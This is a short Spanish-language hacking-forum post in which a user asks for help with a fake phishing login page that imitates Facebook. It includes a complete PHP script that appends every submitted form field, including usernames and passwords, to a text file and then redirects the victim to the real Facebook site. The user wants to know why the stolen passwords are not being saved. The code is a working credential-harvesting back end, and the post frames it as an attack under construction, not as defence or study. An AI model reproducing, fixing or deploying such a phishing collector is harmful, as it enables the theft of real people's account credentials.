elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: AIO elhacker.NET 2021 Compilación herramientas análisis y desinfección malware


  Mostrar Temas
Páginas: [1]
1  Seguridad Informática / Hacking / Hacking basico - consulta sobre pishing, las pass no se guardan en: 22 Abril 2015, 14:12 pm
Buenas, intento probar un fake para pishing, de forma manual (no SET).

El action fue editado para redirigir al code.php, el code.php incluye el siguiente codigo:

Código
  1. <?php
  2. header ('Location:https://he-il.facebook.com/');
  3. $handle = fopen("passwords.txt", "a");
  4. foreach($_POST as $variable => $value) {
  5.   fwrite($handle, $variable);
  6.   fwrite($handle, "=");
  7.   fwrite($handle, $value);
  8.   fwrite($handle, "\r\n");
  9. }
  10. fwrite($handle, "\r\n");
  11. fclose($handle);
  12. ?>
  13.  

Aunque tambien intente sin https (con http).
en el server estan el index.html, el code.php y el passwords.txt, ingreso user y pass,me reenvia a la web legitima pero sin guardar el pass.
Alguna idea? . gracias,saludos.
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines